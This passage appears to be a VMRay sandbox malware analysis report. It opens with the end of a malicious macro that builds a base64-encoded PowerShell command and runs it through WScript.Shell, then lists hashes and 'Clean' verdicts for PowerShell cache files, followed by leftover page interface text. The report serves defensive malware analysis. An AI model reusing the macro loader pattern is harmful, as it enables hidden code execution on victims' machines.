        Imop = Imop + "AFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AE"
        Imop = Imop + "kARQBYAA=="
        Set asd = CreateObject("WScript.Shell")
        asd.Run (Imop)
End Function
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fc085d15-6209-49f0-964b-0399d47037a7 Dropped File Stream
Clean
...
»
MIME Type application/octet-stream
File Size 1.10 KB
MD5 45f24e2adb40aadec8bd2e889208e230 Copy to Clipboard
SHA1 62755f3bcfa5c8de792710720206003d9d9d6f42 Copy to Clipboard
SHA256 063261bb48211cca71e8f2d8ed48972fca8c12f1f11a87267e75ba50c5f1449f Copy to Clipboard
SSDeep 24:WM83yV+ty+YSccYSccKcc839ck9c/9AeS+Z+Wz+q:BSy8PBBO8up/9tlgDq Copy to Clipboard
ImpHash -
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex Modified File Stream
Clean
...
»
MIME Type application/octet-stream
File Size 19.46 KB
MD5 70f25bf3129336d10ca76f83e583ba1c Copy to Clipboard
SHA1 4b167da4780f1e27f34b0adbf95788ff2c996655 Copy to Clipboard
SHA256 59b156891e5cbf96dbfda53d7e5e058220fefc98f649d021ccd37e7fae32bbc4 Copy to Clipboard
SSDeep 384:yEMLxFZsiaiLzSiZxAkb/nJZu9lG2VtPlk0l/0OpdIAsWs5REuX1365oZxMerZl5:zqZn+N6 Copy to Clipboard
ImpHash -
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex Modified File Stream
Clean
...
»
MIME Type application/octet-stream
File Size 19.23 KB
MD5 2221f52213c6d068e968ad1b1066f529 Copy to Clipboard
SHA1 da9beb4d14e5d8cef735bf22fab76c542fed4644 Copy to Clipboard
SHA256 3640d86f86f4d5aa2715240866fad8d51b242da3e709f9600e58dff545e88d94 Copy to Clipboard
SSDeep 384:yEMLxFZsia7LaS0ZxAkb/nJZu9lG2VtPlk0l/0OpdIAsWs5REuX1365oZxMerZlc:FqZn+Nx Copy to Clipboard
ImpHash -
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex Modified File Stream
Clean
...
»
MIME Type application/octet-stream
File Size 19.23 KB
MD5 3dd13cd0049dd1d2f3601c738d73b5d1 Copy to Clipboard
SHA1 645773b3a2dc9bf4014625952e2c1c89224a6e54 Copy to Clipboard
SHA256 d7b9f002a07aa15076dae55454e025bebfa90ec4de50a806c4ab2d4d89808f4f Copy to Clipboard
SSDeep 384:yEMLxFZsiaiLzSiZxAkb/nJZu9lG2VtPlk0l/0OpdIAsWs5REuX1365oZxMerZlc:zqZn+Nx Copy to Clipboard
ImpHash -
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex Modified File Stream
Clean
...
»
MIME Type application/octet-stream
File Size 19.23 KB
MD5 3231ff45a2e34250108c2da3fc3ab11d Copy to Clipboard
SHA1 e4c879cf283e57b181cd4ae2e82bacebc1d7ab27 Copy to Clipboard
SHA256 9d5757c3d2ec247e4f1ca33a6c8432864791e1b9624de22d17bea5660514217f Copy to Clipboard
SSDeep 384:yEjLaFIsFa7LaS0ZxAkb/nJZu9lG2VtPlk0l/0OpdIAsWs5REuX1365oZxMerZlc:5qZn+Nx Copy to Clipboard
ImpHash -
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex Modified File Stream
Clean
...
»
MIME Type application/octet-stream
File Size 19.23 KB
MD5 4ff029714ee1bb9afe7ff24690c82a0c Copy to Clipboard
SHA1 39a68ac15276672bfa1295ead611330f65a15d7e Copy to Clipboard
SHA256 ec121f0722d780a2fbe7a049aa5e13cd000a9b2286b5b3a4fc466bb387405f7d Copy to Clipboard
SSDeep 384:yEMLaFIsFa7LaS0ZxAkb/nJZu9lG2VtPlk0l/0OpdIAsWs5REuX1365oZxMerZlc:MqZn+Nx Copy to Clipboard
ImpHash -
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex Modified File Stream
Clean
...
»
MIME Type application/octet-stream
File Size 19.23 KB
MD5 73102662285cfcc1fab581303b09bc64 Copy to Clipboard
SHA1 d8707f2aa8721d73ae7a39fa495bdd28d4ebb436 Copy to Clipboard
SHA256 4fd07e9c8c2fc7680e5499725c78656c9502c61c4ec4a216cfeb1043b74a63d9 Copy to Clipboard
SSDeep 384:yEMLxFIsFa7LaS0ZxAkb/nJZu9lG2VtPlk0l/0OpdIAsWs5REuX1365oZxMerZlc:dqZn+Nx Copy to Clipboard
ImpHash -
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20 Modified File Stream
Clean
Known to be clean.
...
»
MIME Type application/octet-stream
File Size 10.75 KB
MD5 8845f276e426accd51223008b6aed4bf Copy to Clipboard
SHA1 c9fa81aa57e7c32c4bcefd33788967cc3170fe91 Copy to Clipboard
SHA256 72831bc6962c8017ea71abc038a8f60e79976ebaf05d363c80f32c975a55d0d9 Copy to Clipboard
SSDeep 192:8wUOJGqwAf5CBbXuQuxs0B8HX64MnENxUyrTEAsr9jQ0uwm/CgGZYySo0nbSRNNo:8wUOJGqwARCBbXxss0B8364MnENxUyr3 Copy to Clipboard
ImpHash -
File Reputation Information
»
Verdict
Clean
Known to be clean.
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_67a2505d-bf00-4e2f-b010-406d32caddc3 Modified File Stream
Clean
Known to be clean.
...
»
MIME Type application/octet-stream
File Size 8.73 KB
MD5 de26212a79e7c70ea65871ce7c0142bb Copy to Clipboard
SHA1 0ff4743454228ffabbad8cdacda16726baad110c Copy to Clipboard
SHA256 bff972df82ef871cff56b4093f6953a526992555c2913ecd6fede0d642b7cc0a Copy to Clipboard
SSDeep 192:ScPcWHBxheQYm2/ivkcBRc/hy2fZxy7GkiZ2HGjh1E4LQjNKZWLq5kbMyD41vLSe:ScPcWHBxheQYm2/ivkcBRc/hy2fZxy7U Copy to Clipboard
ImpHash -
File Reputation Information
»
Verdict
Clean
Known to be clean.
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6de40067-cd2a-4666-8cd9-870e0a588215 Modified File Stream
Clean
Known to be clean.
...
»
MIME Type application/octet-stream
File Size 1.59 KB
MD5 5c8ce5ee94c705d5cf9c9f9ff4ba54a6 Copy to Clipboard
SHA1 6266e20e86de3b206706e66c108982166828c7f4 Copy to Clipboard
SHA256 b0ada1a5b9cd3c6c3c9fa895bf63665129ea3ac1be1391a2064296fdf950fe3a Copy to Clipboard
SSDeep 24:WM83yV+ty+hXpDXTX8XAX8X+XpZX4qXpoPXSJMeS+Z+Wz+q:BSy8Pppbr848Oph4ip2SJplgDq Copy to Clipboard
ImpHash -
File Reputation Information
»
Verdict
Clean
Known to be clean.
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6fe77092-4798-42ae-bda5-e7f822b580e9 Modified File Stream
Clean
Known to be clean.
...
»
MIME Type application/octet-stream
File Size 1.15 KB
MD5 9832b59b183bb6318e62f1385d345c6d Copy to Clipboard
SHA1 54b856a180fb3723403f9aad24ca548de63dc376 Copy to Clipboard
SHA256 bfd60204585f1603ee9faac7c44adb9fcd6fa56b7748f03ecb1a9beaa7c56ea1 Copy to Clipboard
SSDeep 24:WM83yV+ty+qXlIZXxf/DXdQXPZX3X6S+Z+Wz+q:BSy8PilIhNTWPhn6lgDq Copy to Clipboard
ImpHash -
File Reputation Information
»
Verdict
Clean
Known to be clean.
VMRay - Analyzer - www.vmray.com
Legal Note - Privacy Policy
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting \"security.fileuri.strict_origin_policy\". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting \"security.fileuri.strict_origin_policy\".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting \"security.fileuri.strict_origin_policy\".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    

     Exit-Icon
    

    

     

      WHOIS Domain Information
     

     

      

       
        Domain Name
       
       
       
      

      

       
        WHOIS Response
       
       
        

       		
      

     

    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image